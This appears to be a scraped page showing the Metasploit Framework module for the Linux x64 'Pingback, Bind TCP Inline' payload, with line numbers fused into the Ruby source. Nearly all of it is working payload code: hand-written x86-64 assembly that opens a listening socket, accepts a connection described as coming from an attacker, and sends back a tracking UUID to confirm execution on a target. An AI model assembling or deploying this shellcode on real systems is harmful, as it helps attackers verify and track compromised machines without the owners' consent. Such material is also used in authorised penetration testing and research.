Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
Views: 11781
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##4567module MetasploitModule89CachedSize = 1091011include Msf::Payload::Linux12include Msf::Payload::Single13include Msf::Payload::Pingback14include Msf::Payload::Pingback::Options1516def initialize(info = {})17super(merge_info(info,18'Name' => 'Linux x64 Pingback, Bind TCP Inline',19'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',20'Author' => [ 'bwatters-r7' ],21'License' => MSF_LICENSE,22'Platform' => 'linux',23'Arch' => ARCH_X64,24'Handler' => Msf::Handler::BindTcp,25'Session' => Msf::Sessions::Pingback26))27def generate(opts={})28# 22 -> "0x00,0x16"29# 4444 -> "0x11,0x5c"30encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first31encoded_host = Rex::Socket.addr_aton("0.0.0.0").unpack("V").first32encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]33self.pingback_uuid ||= self.generate_pingback_uuid34uuid_as_db = "0x" + pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")3536asm = %Q^37push rsi38push rax39;SOCKET40push 0x2941pop rax42cdq43push 0x244pop rdi45push 0x146pop rsi47syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)48test rax, rax49js failed5051xchg rdi, rax52mov rcx, #{encoded_host_port}53push rcx54mov rsi, rsp55push rsp56pop rsi ; store pointer to struct5758bind_call:59; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)60; rdi -> fd already stored in rdi61; rsi -> pointer to sockaddr_in6 struct already in rsi62push 0x3163pop rax ; bind syscall64push 0x10 ; sockaddr length65pop rdx ;66syscall6768listen_call:69; int listen(int sockfd, int backlog);70; rdi -> fd already stored in rdi71push 0x3272pop rax ; listen syscall73push 0x174pop rsi ; backlog75syscall7677accept_call:78; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);79; rdi -> fd already stored in rdi80push 0x2b81pop rax ; accept syscall82cdq ; zero-out rdx via sign-extension83push rdx84push rdx85push rsp86pop rsi ; when populated, client will be stored in rsi87push 0x1c88lea rdx, [rsp] ; pointer to length of rsi (16)89syscall90xchg rdi, rax ; grab client fd91send_pingback:92; sys_write(fd:rdi, buf*:rsi, length:rdx)93push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID94pop rdx ; length in rdx95call get_uuid_address ; put uuid buffer on the stack96db #{uuid_as_db} ; PINGBACK_UUID97get_uuid_address:98pop rsi ; UUID address into rsi99xor rax, rax ; sys_write = offset 1100inc rax ; sys_write = offset 1101syscall ; call sys_write102103failed:104push 0x3c105pop rax106push 0x1107pop rdi108syscall ; exit(1)109^110Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string111end112end113end114115116